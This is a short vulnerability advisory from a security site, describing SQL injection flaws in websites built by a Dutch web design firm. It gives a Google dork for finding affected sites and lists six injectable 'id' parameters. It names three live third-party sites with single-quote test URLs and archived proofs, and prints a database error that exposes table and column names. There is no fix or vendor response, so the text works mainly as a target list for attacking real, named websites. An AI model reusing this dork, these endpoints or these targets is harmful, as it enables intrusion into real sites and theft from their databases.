Site Specken.NL + Starque.Com Groningen Web Design Netherlands SQL Injection Vulnerability

2018.10.01
Risk: Medium
Local: No
Remote: Yes
CVE: N/A
CWE: CWE-89

################################################################################################# # Exploit Title : Site Specken.NL + Starque.Com Groningen Web Design Netherlands SQL Injection Vulnerability # Author [ Discovered By ] : KingSkrupellos from Cyberizm Digital Security Army # Date : 30/09/2018 # Vendor Homepages : Specken.NL ~ Starque.Com # Tested On : Windows and Linux # Category : WebApps # Exploit Risk : Medium # CWE : CWE-89 [ Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection') ] ################################################################################################# # Google Dork : intext:''SITE: SPECKEN.NL + STARQUE.COM'' # SQL Injection Exploits : /events.php?id=[SQL Injection] /nieuwsitem.php?id=[SQL Injection] /morogroningen/evenement.php?id=[SQL Injection] /morogroningen/arrangement.php?id=[SQL Injection] /cervantesgroningen/fotoalbum.php?id=[SQL Injection] /cervantesgroningen/menukaart.php?id=[SQL Injection] ################################################################################################# # Example Vulnerable Site => hemingwaygroningen.nl/events.php?id=280%27 => [ Proof of Concept ] => archive.is/SqjkF bennergroep.nl/morogroningen/evenement.php?id=134%27 => [ Proof of Concept ] => archive.is/2O9Yv viaromanica.nl/morogroningen/evenement.php?id=136%27 => [ Proof of Concept ] => archive.is/1tLTs # SQL Database Error => Zoekvraag kon niet uitgevoerd worden: errorno=1064 error=You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ''280''' at line 4 query=select e.evenement_id, e.geactiveerd, e.titel, e.subtitel, e.afbeelding_id, e.producent_id, date_format (e.datum,'%d-%m-%Y') , e.aanvang, e.zaalopen, e.status_id, e.entreedeur, e.entreevvk, e.soort_id, e.link, e.wekelijks, e.tekst, date_format(e.lioc_datum,'%d-%m-%Y') ,date_format(e.lioc_datum,'%H:%i'), e.lioc_user, e.altdatum ,e.afbeeldinglinks_id , r.website , DATEDIFF(e.datum,CURDATE())from evenementen e, restaurants r where e.restaurant_id = r.restaurant_id and e.evenement_id = '280'' ################################################################################################# # Discovered By KingSkrupellos from Cyberizm.Org Digital Security Team #################################################################################################

References:

https://www.cyberizm.org/cyberizm-site-specken-starque-groningen-web-design-sql-inj.html


Vote for this issue:
100%
0%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2018, cxsecurity.com

 

Back to Top